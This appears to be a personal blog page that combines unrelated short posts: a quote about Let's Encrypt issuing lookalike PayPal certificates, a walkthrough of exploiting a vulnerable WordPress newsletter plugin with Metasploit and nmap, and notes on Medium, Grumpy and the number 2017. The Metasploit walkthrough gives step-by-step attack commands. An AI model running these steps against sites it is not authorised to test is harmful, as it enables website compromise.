Myles Braithwaite

By December 8, 2016, Let's Encrypt had issued 409 certificates containing “Paypal” in the hostname; that number is up to 709 as of this morning. Other targets include BankOfAmerica (14 certificates), Apple, Amazon, American Express, Chase Bank, Microsoft, Google, and many other major brands. LetsEncrypt validates only that (at one point in time) the certificate applicant can publish on the target domain; the CA also grudgingly checks with the SafeBrowsing service to see if the target domain has already been blocked as malicious, although they “disagree” that this should be their responsibility. Let's Encrypt’s short position paper is worth a read; many reasonable people agree with it.

This is a quick blog post about exploiting a WordPress website using Metasploit on Kali Linux.

Identify a Remote Host

msf > db_nmap -v -sV
Scan an Entire Network

This will save the results to the metasploit database

msf > nmap -v -sV -oA subnet_1
  • hosts will list all the hosts found by nmap.
  • hosts -R will add them to the list of hosts to exploit.

Searching for a WordPress Vulnerability

msf > search name:wordpress

Use an Exploit

This will select an exploit to use:

msf > use exploit/unix/webapp/wp_wysija_newsletters_upload

This will show you the attacks that the exploit will take advantage of:

msf exploit(wp_wysija_newsletters_upload) > show payloads

This will show what software and version will be targeted:

msf exploit(wp_wysija_newsletters_upload) > show targets
Exploit targets:

    Id  Name
    --  ----
    0   wysija-newsletter < 2.6.8

Next configure the Exploit

msf exploit(wp_wysija_newsletters_upload) > show options
Module options (exploit/unix/webapp/wp_wysija_newsletter_upload):

    Name        Current Settings    Required    Description
    ----        ----------------    --------    -----------
    Proxies                         no          A proxy chain of format type:host:port[,type:host:port][...]
    RHOST                       no          The target address
    RPORT       80                  yes         The target port
    SSL         false               no          Negotiate SSL/TLS for outgoing connections
    TARGETURI   /                   no          The base path to the wordpress application
    VHOST                           no          HTTP server virtual host

Exploit target:

    Id  Name
    --  ----
    0   wysija-newsletters < 2.6.8

Here is where we set all the options:

msf exploit(wp_wysija_newsletters_upload) > set RHOST
msf exploit(wp_wysija_newsletters_upload) > set RPORT 443
msf exploit(wp_wysija_newsletters_upload) > set SSL true
msf exploit(wp_wysija_newsletters_upload) > set VHOST

Run the Exploit

msf exploit(wp_wysija_newsletters_upload) > exploit


Wow, that was way easier than I thought it would be.
Although, I guess so is everything.

But I don’t think we’ll grow old together, Medium and I. I suspect it’ll end quite tragic, actually. $132,000,000 is a lot of money after all, and that’s how much venture capital Medium has been dipped in. Before having a prayer or a song about how to turn into that multi-billion-dollar business it must to satisfy the required rate of return.


Grumpy is an experimental Python runtime for Go. It translates Python code into Go programs, and those transpiled programs run seamlessly within the Go runtime. We needed to support a large existing Python codebase, so it was important to have a high degree of compatibility with CPython (quirks and all). The goal is for Grumpy to be a drop-in replacement runtime for any pure-Python project.

2017 is not just another prime number

TJ Wei on why 2017 is not just any prime number:

2017π (rounds to nearest integer) is a prime.

2017e (rounds to nearest integer ) is a prime.

The sum of all odd primes up to 2017 is a prime number, i.e. 3+5+7+11+...+2017 is a prime number.

The sum of the cube of gap of primes up to 2017 is a prime number. That is (3-2)^3 + (5-3)^3 + (7-5)^3 + (11-7)^3 + ... + (2017-2011)^3 is a prime number.